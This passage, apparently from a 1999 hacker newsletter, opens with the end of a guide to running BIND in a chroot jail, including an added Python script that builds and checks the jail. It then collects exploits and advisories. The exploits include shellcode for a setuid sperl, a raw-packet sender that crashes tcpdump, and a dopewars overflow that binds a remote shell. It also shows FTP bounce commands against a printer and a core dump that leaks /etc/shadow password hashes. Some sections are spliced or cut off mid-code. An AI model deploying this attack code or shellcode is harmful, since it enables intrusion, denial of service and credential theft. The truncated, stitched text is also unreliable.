srw-rw-rw- 1 root wheel 0 Jan 01 12:00 log

The "s" bit is set to indicate that the file is a socket. This is how named will write to syslog from within the chroot() jail. Now type:

/chroot/named/usr/sbin/named -u named -g named -t /chroot/named

If all goes well named will start and your logs will indicate that named is "Ready to answer queries." Perform other DNS tests as appropriate to ensure operation, then reboot your system and verify the setup. BIND should have started and reported that it chroot()ed to the directory and changed UID/GID. You can use a program such as lsof to list the owner of all network sockets on the host. The owner should be your named UID/GID. When everything is working you should rename /etc/namedb to something like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure that the old version doesn't get run by mistake. Reboot your system and, assuming everything is correct, your named will now be chroot()ed.
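Steps Three through Six amount to laying out the jail and then proving that named can find everything it needs from inside it. The following is an added example, not Craig Rowland's script: build_jail() creates the directory layout from Step Three and copies the files listed there, and verify_jail() performs the checks that otherwise only show up as "complaints" in syslog: that every zone file referenced by named.conf exists inside the jail (resolved against the options directory, as named does), that the static binaries are present, and that dev/log is a socket, which is what holelogd provides. It runs as an unprivileged user on a constructed source tree; mknod of dev/null and chown of var/run are only attempted as root, and the datagram socket bound at dev/log is a stand-in for holelogd, not a syslog relay. The GID 53 and the sample named.conf are assumptions.

```python
"""Build and verify a /chroot/named layout as described in Steps Three to
Six. Added example, not Craig Rowland's script. The source tree and
named.conf are constructed for the demonstration."""
import os
import re
import shutil
import socket
import stat
import tempfile

JAIL_DIRS = ["dev", "etc", "etc/namedb", "usr/sbin", "var/run"]
NAMED_GID = 53      # assumed GID of the dedicated named group


def build_jail(jail, src_etc, binaries):
    """Step Three: directories, named.conf, localtime, zone files, static
    binaries, a one-line /etc/group, dev/null, and a writable var/run."""
    for d in JAIL_DIRS:
        os.makedirs(os.path.join(jail, d), exist_ok=True)
    for name in ("named.conf", "localtime"):
        src = os.path.join(src_etc, name)
        if os.path.exists(src):
            shutil.copy2(src, os.path.join(jail, "etc", name))
    src_db = os.path.join(src_etc, "namedb")
    for name in os.listdir(src_db):
        shutil.copy2(os.path.join(src_db, name), os.path.join(jail, "etc/namedb", name))
    for path in binaries:
        shutil.copy2(path, os.path.join(jail, "usr/sbin", os.path.basename(path)))
    with open(os.path.join(jail, "etc/group"), "w") as f:
        f.write(f"named:x:{NAMED_GID}:\n")        # named's GID is the only entry
    if os.geteuid() == 0:
        try:    # needs CAP_MKNOD; a container may refuse, verify_jail reports it
            os.mknod(os.path.join(jail, "dev/null"), 0o666 | stat.S_IFCHR, os.makedev(1, 3))
            os.chown(os.path.join(jail, "var/run"), -1, NAMED_GID)
            os.chmod(os.path.join(jail, "var/run"), 0o775)   # named.pid must be writable
        except OSError:
            pass
    return jail


def verify_jail(jail):
    """Return the list of things named would fail on or complain about."""
    problems = []
    for d in JAIL_DIRS:
        if not os.path.isdir(os.path.join(jail, d)):
            problems.append(f"missing directory {d}")
    conf = os.path.join(jail, "etc/named.conf")
    if not os.path.exists(conf):
        return problems + ["etc/named.conf missing"]
    with open(conf) as f:
        text = f.read()
    m = re.search(r'directory\s+"([^"]+)"', text)
    workdir = m.group(1) if m else "/"
    for zf in re.findall(r'file\s+"([^"]+)"', text):
        rel = zf if zf.startswith("/") else os.path.join(workdir, zf)
        if not os.path.exists(os.path.join(jail, rel.lstrip("/"))):
            problems.append(f"zone file {rel} not present inside the jail")
    for b in ("named", "named-xfer"):
        if not os.path.exists(os.path.join(jail, "usr/sbin", b)):
            problems.append(f"usr/sbin/{b} missing")
    log = os.path.join(jail, "dev/log")
    if not (os.path.exists(log) and stat.S_ISSOCK(os.stat(log).st_mode)):
        problems.append("dev/log is not a socket: holelogd not started")
    null = os.path.join(jail, "dev/null")
    if not (os.path.exists(null) and stat.S_ISCHR(os.stat(null).st_mode)):
        problems.append("dev/null is not a character device")
    return problems


def stand_in_for_holelogd(jail):
    """Bind a datagram socket at dev/log so the jail looks as it does after
    'holelogd /chroot/named/dev/log'. Stand-in only; nothing is forwarded."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    s.bind(os.path.join(jail, "dev/log"))
    return s


def build_sample_source():
    """Constructed /etc with one zone file present and one deliberately missing."""
    etc = os.path.join(tempfile.mkdtemp(prefix="bind-src-"), "etc")
    os.makedirs(os.path.join(etc, "namedb"))
    with open(os.path.join(etc, "named.conf"), "w") as f:
        f.write('options { directory "/etc/namedb"; };\n'
                'zone "example.test" { type master; file "db.example"; };\n'
                'zone "missing.test" { type master; file "db.missing"; };\n')
    with open(os.path.join(etc, "localtime"), "wb") as f:
        f.write(b"TZif")
    with open(os.path.join(etc, "namedb", "db.example"), "w") as f:
        f.write("$TTL 3600\n")
    binaries = []
    for b in ("named", "named-xfer"):       # stand-ins for the static binaries
        p = os.path.join(os.path.dirname(etc), b)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
        binaries.append(p)
    return etc, binaries


def run_demo():
    etc, binaries = build_sample_source()
    jail = build_jail(tempfile.mkdtemp(prefix="chroot-named-"), etc, binaries)
    try:
        sock, have_socket = stand_in_for_holelogd(jail), True
    except OSError:
        sock, have_socket = None, False
    problems = verify_jail(jail)
    if sock:
        sock.close()
    return {"jail": jail, "syslog_socket": have_socket, "problems": problems}


if __name__ == "__main__":
    for p in run_demo()["problems"]:
        print(p)
```

On a real install, point build_jail at /etc and the freshly built static binaries, start holelogd instead of the stand-in, and run verify_jail before the first named -t start; the missing zone file is exactly the kind of path that works outside the jail and silently fails inside it.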
Thanks

Thanks to the following people who made suggestions and submitted corrections:

Steinar Haug - Comments concerning blocking of TCP to port 53.
Bernhard Weisshuhn - Comments pertaining to the Linux install (typos, adding the /etc/group entry).
Marc Heuse - Comments pertaining to logging and renaming of old binaries and directories.
Jan Gruber - Comments pertaining to permissions on /chroot/named/var/run and changes to the ndc control script.

All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems
http://www.psionic.com/misc/contact
Site last updated: 1999/03/24

@HWA

65.0 Exploit for FreeBSD sperl4.036 by OVX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za

/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/
#include
#include
#include
#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void) { asm("movl %esp,%eax"); }

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    for(i=0+1;i

On receiving an IP packet with protocol 4 and ihl=0, tcpdump enters an infinite loop within the procedure ip_print() in the file print-ip.c. This happens because the header length (ihl) equals 0 and tcpdump tries to print the packet.
------------------------------------------------------------------------------
I've tried the bug on different OSes:

Linux:
  SuSE 6.x:   K2.0.36   tcpdump consumes all the system memory
              K2.2.5    in less than a minute and hangs the system,
              K2.2.9    or sometimes gives a bus error
              K2.3.2
              K2.3.5
  RedHat 5.2: K2.?.?    tcpdump segfaults
         6.0: K2.2.9    and sometimes dumps core
  Debian:     K2.2.?
tcpdump makes a segmentation fault to happen and does a coredump Freebsd: Segmentation fault & Coredump Thanks to: wb^3,Cagliostr Solaris: Segmentation fault & Coredump Thanks to: acpizer Aix: ? Hp-UX: ? ----------------------------------------------------------------------------- This tests have been carried out in loopback mode, given that protocol 4 won't get through the routers. It would be interesting to perform the attack remotely in an intranet. But i do not have access to one. ------------------------------------------------------------------------------ Thanks to: the channels: #ayuda_irc, #dune, #linux, #networking, #nova y #seguridad_informática. from irc.irc-hispano.org Special thanks go to: Topo[lb], ^Goku^, Yogurcito, Pixie, Void, S|r_|ce, JiJ79, Unscared etc... Thanks to Piotr Wilkin for the rip base code ;) And big thanks go to TeMpEsT for this translation. ------------------------------------------------------------------------------ I've found two ways of solving the problem Solution 1 execute: tcpdump -s 24 Solution 2 Apply this little patch. diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c *** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997 --- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998 *************** ip_print(register const u_char *bp, regi *** 440,446 **** (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); - ip_print(cp, len); if (! 
vflag) {
  			printf(" (ipip)");
  			return;
--- 440,445 ----
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netdb.h>

struct icmp_hdr {
    struct iphdr iph;
    char text[16];      /* 16 bytes are stored below; the original declared 15 and overran it */
} encaps;

/* Internet checksum; kept from the original but never called */
int in_cksum(int *ptr, int nbytes)
{
    long sum;
    u_short oddbyte, answer;

    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1) {
        oddbyte = 0;
        *((u_char *)&oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

/* Resolve the destination name into a sockaddr_in for sendto() */
struct sockaddr_in sock_open(int socket, char *address, int prt)
{
    struct hostent *host;
    struct sockaddr_in sin;

    if ((host = gethostbyname(address)) == NULL) {
        perror("Unable to get host name");
        exit(-1);
    }
    bzero((char *)&sin, sizeof(sin));
    sin.sin_family = PF_INET;
    sin.sin_port = htons(prt);
    bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
    return(sin);
}

int main(int argc, char **argv)
{
    int sock;
    int on = 1;
    struct sockaddr_in addrs;
    unsigned char packet[1204];   /* the original sent 1204 bytes straight out of the
                                     36-byte struct; copy it into a zeroed buffer instead */

    printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n");
    if (argc < 3) {
        printf("Uso: %s \n", argv[0]);   /* argv[1] = source address, argv[2] = destination */
        exit(-1);
    }

    /* payload text, stored byte by byte */
    encaps.text[0]=66;  encaps.text[1]=76;  encaps.text[2]=65;  encaps.text[3]=68;
    encaps.text[4]=73;  encaps.text[5]=32;  encaps.text[6]=84;  encaps.text[7]=90;
    encaps.text[8]=32;  encaps.text[9]=84;  encaps.text[10]=79; encaps.text[11]=32;
    encaps.text[12]=84; encaps.text[13]=79; encaps.text[14]=80; encaps.text[15]=79;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("socket");
        exit(-1);
    }
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) {
        perror("Can't set IP_HDRINCL option on socket");
    }
    fflush(stdout);
    addrs = sock_open(sock, argv[2], random() % 255);

    /* The malformed header: version 0, header length 0, protocol 4 (IP-in-IP) */
    encaps.iph.version = 0;
    encaps.iph.ihl = 0;
    encaps.iph.frag_off = htons(0);
    encaps.iph.id = htons(0x001);
    encaps.iph.protocol = 4;
    encaps.iph.ttl = 146;
    encaps.iph.tot_len = 6574;
    encaps.iph.daddr = addrs.sin_addr.s_addr;
    encaps.iph.saddr = inet_addr(argv[1]);

    printf("\t DuMpInG %s ---> %s \n", argv[1], argv[2]);
    memset(packet, 0, sizeof(packet));
    memcpy(packet, &encaps, sizeof(encaps));
    if (sendto(sock, packet, sizeof(packet), 0, (struct sockaddr *)&addrs,
               sizeof(struct sockaddr)) == -1) {
        if (errno != ENOBUFS)
            printf("Error :(\n");
    }
    fflush(stdout);
    close(sock);
    return 0;
}

67.0 dopewarez.c exploit for Dopewars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

/*
 * dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
 *
 * URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
 *
 * C0de by nuuB [Sep 25, 1999]. Linux version.
 *
 * 0wn a server:
 *
 *   (dopewarez [] | nc 7902)& ; sleep 5 ; nc 31337
 *
 * 0wn a client using a bogus server:
 *
 *   (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc 31337
 *
 * Overflow occurs in ProcessMessage().
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>

#define EGGSIZE 598
#define EIP_OFFSET 208
#define FIRST_OFFSET 236
#define WRD_STACK_OFFSET 0x0bb0        /* approximate for server */
#define OWNED_FIRST 0xbffffffc-132     /* 132 = offset for Player->next */
#define C0DE_SIZE 213

char c0de[]=
    "\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
    "\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
    "\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
    "\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
    "\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
    "\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
    "\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
    "\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
    "\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
    "\xc0\xb0\x01\xcd\x80";

char egg[EGGSIZE+1];

void bail(char *s)
{
    puts(s);
    exit(1);
}

/* Convert a 32-bit value to 4 raw bytes, refusing NULs and the '^' terminator */
char *htol_LEstr(unsigned long num)
{
    static char buf[5];
    unsigned long n;

    n=htonl(num);
    buf[0]=(n>>24)&0xff;
    buf[1]=(n>>16)&0xff;
    buf[2]=(n>>8)&0xff;
    buf[3]=n&0xff;
    buf[4]=0;
    if(strlen(buf) != 4) bail("NULL detected!");
    if(strchr(buf, '^')) bail("caret detected!");
    return buf;
}

int main(int argc, char *argv[])
{
    unsigned long eip;

    /* Try to land splat in the middle of the NOPs after FIRST_OFFSET */
    eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET);
    eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2;
    if(argc >= 2) {
        if(!strncmp("0x", argv[1], 2))   /* Absolute */
            eip=strtoul(argv[1], 0, 0);
        else
            eip+=atoi(argv[1]);
    }
    fprintf(stderr, "Using EIP=0x%08lx\n", eip);

    memset(egg, 'A', EGGSIZE);
    strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2);
    strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4);
    strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2);
    strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
    memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE);
    strcpy(egg+EGGSIZE-2, "^\n");
    printf("%s", egg);
    return 0;
}

68.0 Linux forged packets
~~~~~~~~~~~~~~~~~~~~

Date: Sat, 23 Oct 1999 18:34:56 +0200
Reply-To: Pavel Kankovsky

The advisory did not explain what was the cause of the problem. (Rant: Why? Will the following explanation help anyone who would not be able to find out this piece of information himself to abuse the bug?)

As far as I can tell, the problem is this: anyone, including mere mortals, is allowed to use TIOCSETD. Therefore anyone can set the PPP line discipline on a tty under his control and send forged datagrams right into the kernel network subsystem.

I do not believe there is any reason why mortals should ever be allowed to use TIOCSETD (at least under Linux), therefore adding something like "if (!suser()) return -EPERM;" under "case TIOCSETD:" in drivers/char/tty_io.c should fix the problem for 2.0 (things are a bit more complicated in 2.2 but we've already got a fix for 2.2).

But remember: you use it at your own risk, there is no guarantee this patch will not kill all your family when used improperly.
--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

NAME
    user-rawip-attack

AUTHOR
    Marc SCHAEFER with the help of Alan COX (for the fix) and of Andreas Trottmann for the work-around idea.

VERSION
    $Id: user-raw-IP,v 1.3 1999/10/22 08:33:10 schaefer Exp $

ABSTRACT
    Forged packets can be sent out from a Linux system, for example for NFS attacks or any other protocol relying on addresses for authentication, even when protected from the outside interfaces by firewalling rules. Most of the time, existing firewalling rules are bypassed. This requires at least a shell account on the system.

IMPACT
    Any local user can send any packet to any host from most Linux default installations without the use of any permission problem or suid flaw. Basically, it corresponds to having write-only permission to a raw IP socket on the server machine.

IMMUNE CONFIGURATIONS
    You are immune to this problem if one (or more) of the following is true:
    - you do not have local (shell) users
    - SLIP and PPP are not compiled into the kernel and either are not available in /lib/modules/* as modules, or are never loaded and kerneld/kmod is not available.
    - you use a deny-default configuration for your input firewall rules, and you don't have accept entries for specific addresses or for unused ppp or slip interfaces (and the used ones are never unused, or accept rules are safely removed at shutdown).
    - you use 2.3.18 with the ac6 patch (or higher).
    - you use 2.2.13pre15 (or higher).

OPERATING SYSTEMS
    Linux (any until recently)

POSSIBLE-WORK-AROUNDS
    - Make it so that SLIP and PPP support are not available, or
    - Use a deny default policy for the input firewall, only allow for specific address ranges and specific interfaces. For dynamic links (such as SLIP or PPP), add an accept at link creation time, and remove the entry when the link goes down.

FIX
    - For 2.3.x, install 2.3.18 with the ac6 patch (or higher).
      Warning, this is a DEVELOPMENT kernel.
    - For 2.2.x, install 2.2.13pre15 or higher (e.g. 2.2.13).
    - At this time no fix for 2.0.x. Please apply the above mentioned work-arounds.

EXPLOIT
    Please do not request the exploit from the listed authors. Requests for exploits will be ignored. A working exploit exists and has been tested on current Linux distributions. It is possible that an exploit be posted some time in the future (or that someone reads this and does it by himself ...).

NOTES
    This advisory is for information only. No warranty either expressed or implied. Full disclosure and dissemination are allowed as long as this advisory is published in full. No responsibility will be taken for abuse or lack of use of the information in this advisory.

@HWA

69.0 Nashuatec printer is vulnerable to various attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

hi,

The NASHUATEC D445 printer is vulnerable to many attacks. There are 4 common services that run in a standard configuration: httpd, ftpd, telnetd, printer (tested with nmap). I discovered last day at least three different ways to attack this kind of box.

First, it's possible to configure the server remotely via its own admin web server (port 80). Naturally the server 'll ask u for an admin password before submitting the form to the cgi. The password field is 15 chars in length, but an intruder with a lightly modified copy of the original form 'll be able to submit many more chars (about 260 will be enough for the test) to the cgi and produce a buffer overflow (see the example below). The cgi concerned is "reset" but i suppose every cgi is exposed to this problem. If our intruder decides to forge a special password with instruction code inside he'll force the remote printer to execute code with the target web server privilege. I don't have, now, all the required information to gain server privilege but u may find it here very soon :)

Attacker form example:

Nashuadeath
NIB 450-E
Unit Serial Number 599132
Reset Unit
A very big password is required to perform this function ( at least 260 chars length ).
[ Home | Unit Info ]
Another flaw is present in the ftp daemon that permits the infamous "bounce attack":

  ftp printer.victim.com
  user xxxxx
  pass xxxxx
  quote port a1,a2,a3,a4,0,25

a1.a2.a3.a4 is any other ip address. The ftp server checks neither the type of port in the request ( < 1024 = administrative port ) nor the ip address used. So an intruder may use the service to attack some other boxes anonymously.

The last one is a denial of service with an icmp redirect storm against the printer ip stack. Use winfreez.c to test it. The printer 'll not respond anymore during the attack.

Have a nice day,

Gregory Duchemin.

-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84
Fax: 01.41.43.84.80

@HWA

70.0 xmonisdn bug
~~~~~~~~~~~~

http://packetstorm.securify.com

From: Ron van Daal

Hello,

While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert sWarning: Cannot convert string "netstop" to type Pixmap
[1]+  Stopped                 xmonisdn -file /etc/shadow
[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[syntonix@damien bin]# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
[syntonix@damien bin]# strings core|less
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:108operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal@syntonic.net | www.syntonic.ne

@HWA

71.0 Nasty stack smashing bug in Linux-2.2.12 execve
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

From: ben@VALINUX.COM
Subject: execve bug linux-2.2.12

While doing some debugging, I discovered a really nasty stack smash bug in linux-2.2.12. I haven't checked previous versions of the 2.2 kernel, but the bug appears to be fixed in linux-2.2.13pre17. If I am reading this correctly, the implications of this bug could be very dire. It may be possible to easily obtain root privilege on any box running this kernel.
Basically the problem is that the execve system call checks that argv is a valid pointer but it doesn't check that all of the pointers in the argv array are valid pointers. If you pass bad pointers into the execve system call you can corrupt the process's stack before it returns to user space. Then when the kernel hands off the process to the elf loader code, which begins to set up the process, it can be made to execute some malicious code in place of the program's main function.

This is particularly scary because all of this occurs BEFORE the program begins executing its main function and AFTER the program returns to user space with privilege. Therefore no matter how well audited the program may be it can be used to gain privilege.

The thing that tipped me off to the problem was that a program that I exec'd was getting killed with SIGSEGV in __libc_start_main before my main function began running.

-ben

Per popular demand here is some more information on the bug I've been observing. I'm sorry. I wish I had thought to include this in my original post:

Here is one ltrace fragment where my program only corrupts one of the parameters:

[pid 578] execv("/bin/grep", 0x7ffffcdc <unfinished ...>
[pid 578] __libc_start_main(0x0804a4e0, 200, 0x7fffb3a4, 0x08048bf4, 0x080516dc <unfinished ...>
[pid 578] --- SIGSEGV (Segmentation fault) ---
[pid 578] +++ killed by SIGSEGV +++
--- SIGCHLD (Child exited) ---

Here is some information from gdb:

(gdb) core-file /tmp/core
Core was generated by Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_") at ../sysdeps/generic/getenv.c:88
../sysdeps/generic/getenv.c:88: No such file or directory.
(gdb) bt
#0  0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_") at ../sysdeps/generic/getenv.c:88
#1  0x2aae689b in __secure_getenv (name=0x2aba8560 "MALLOC_TRIM_THRESHOLD_") at secure-getenv.c:29
#2  0x2ab1e2e0 in ptmalloc_init () at malloc.c:1689
#3  0x2aade211 in __libc_preinit (argc=200, argv=0x7fffb3a4, envp=0x7fffb6c8) at set-init.c:26
#4  0x2aade030 in __libc_start_main (main=0x804a4e0 <strcpy+5500>, argc=200, argv=0x7fffb3a4, init=0x8048bf4, fini=0x80516dc <strcpy+34680>, rtld_fini=0x2aab5ad4 <_dl_fini>, stack_end=0x7fffb39c) at ../sysdeps/generic/libc-start.c:68
(gdb)

This was just one run. There were other runs where more interesting things happened. There was one in particular where the pointer to init was corrupted but I haven't been able to reproduce that one yet.

I put the source code for the program I was debugging at the time when I stumbled into this at: "ftp://ftp.bastille-linux.org/bastille/broken-fuzz.c.gz". Note: this is not a working program!!! Do not take this as a release. I have since fixed many bugs in it. I coded it up and was in the process of making it work for the first time when I stumbled across this problem. In its current form its only purpose is to demonstrate the problem that I saw.

To trigger the problem simply run the program with the -ba option and the name of your favorite executable. e.g. "./fuzz -ba grep"

-ben

To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Fri Oct 15 1999 19:20:14
Author: visi0n

Whoa, I think the kernel 2.0.38 has the same bug, and one more, in the count() function to check how many argv's the bin has: it doesn't check for the max number of argv's. This is worse than the bug found in 2.2.12 execve().

To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Sat Oct 16 1999 07:22:02
Author: Alan Cox

> Basically the problem is that the execve system call checks that argv
> is a valid pointer but it doesn't check that all of the pointers in
> argv array are valid pointers.
> If you pass bad pointers into the

This is incorrect. To start with - it builds the argv pointer array itself. The passed array is simply used to get a list of strings and to build them on the stack of the target process. The argv and envp is then built by the ELF loader walking these tables in order to generate the argv and envp arrays that the SYS5 ABI expects to be passed (saner ABI's the user space start up builds argc/argv).

> execve system call you can corrupt the processes stack before it
> returns to user space. Then when the kernel hands off the process to

I don't think you can. The built ELF stack looks roughly like

[Environment]  - null terminated string data
[Arguments]    - null terminated string data
[Elf gloop]
[envp]
[argv]
[argc]         -> You are here on entry, so the stack is fine.

> The thing that tipped me off to the problem was that a program that I
> exec'd was getting killed with SIGSEGV in __libc_start_main before my
> main function began running.

I would certainly be interested in an example that caused this. That there could be a bug in the kernel or glibc exec building I can believe. Your diagnosis of the cause however is dubious.

Alan

To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Sat Oct 16 1999 14:13:19
Author: security@xirr.com

Caveat: I am running linux-2.2.12ow6 which contains many security fixes, yet I believe my comments are still valid. Also I am not a kernel guru.

> Basically the problem is that the execve system call
> checks that argv is a valid pointer but it doesn't check
> that all of the pointers in argv array are valid pointers.

The kernel copies each argv[i] into a contiguous chunk of the (soon to be) stack. Thus it must dereference each argv[i]. Check out linux/fs/exec.c line 261 for an almost explicit dereference of argv[i] (memcpy(str,argv+i) except kernel to user space version).
This is confirmed by a small test program:

#include "nolibc.h"

main(int argc, char** argv, char **envp)
{
    int i;
    char buf[32];

    argv[1]=2;
    i=execve("/bin/sh",argv,envp);
    /* we should never reach this point, but print out errno in hexadecimal */
    i=htonl(i);
    i=itoh(&i,buf);
    buf[i]='\n';
    write(1,buf,i+1);
}

This program does not run /bin/sh but instead prints out the message 0000000e representing errno=14, EFAULT. This means the kernel got a segfault while copying the argv[i]'s to the stack, and thus failed the syscall.

This program is linked with 'gcc -O -fno-builtin -nostdlib test.c'. nolibc.h is ugly but available by request under GPL. It defines ntohl, itoh, write, execve, and _start. Note execve, htonl, itoh, and write are macros. Execve/write are direct system calls. (itoh converts 4 bytes to an 8-byte hex representation and returns 8, htonl byte swaps so the bytes come out in the right order).

> The thing that tipped me off to the problem was that a
> program that I exec'd was getting killed with SIGSEGV
> in __libc_start_main before my
> main function began running.

I'm not really sure if this is a widespread problem, but ANYTIME libc gets hosed (malloc(-1) for example) gdb reports the problem occurring in a function called from __libc_start_main and does not ever mention main.

I'll study this a wee bit more, since the references I'm using for the startup state don't seem to jive with my experience. (Namely I never see an array of pointers being setup in the docs, and my programs definitely do not do so, yet they function and dereference argv as if it were an array of pointers).

Another remark: If I misunderstood the bug (like argv[1]=2 obviously is not valid, and is not what you meant) please let me know.

Author: Matt Chapman

On Sat, Oct 16, 1999 at 02:22:02PM +0100, Alan Cox wrote:
>
> I would certainly be interested in an example that caused this.
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#define BADPTR (char *)0x10 /* for example */

int main(int argc, char **argv, char **envp)
{
    char *args[7];
    int i;

    args[0] = "su";
    for (i = 1; i < 6; i++) {
        args[i] = BADPTR;
    }
    args[6] = NULL;
    execve("/bin/su", args, envp);
    printf("%s\n", strerror(errno));
    return 1;
}

This program (on my system at least 5 bad arguments are needed) reproducibly dies with SIGSEGV on 2.2.12. A similarly configured system with kernel 2.0.36 correctly reports EFAULT.

This would not normally be a problem, however... the above program will not dump core for an ordinary user, only root, which makes me believe that the fault occurs after the process has gained the root euid from /bin/su.

A gdb trace suggests the usual heap corruption in glibc, which does not seem to be related to the arguments passed to execve (as long as they are bad), so I doubt this is exploitable. However it is most likely a bug somewhere.

Matt

--
Matthew "Austin" Chapman
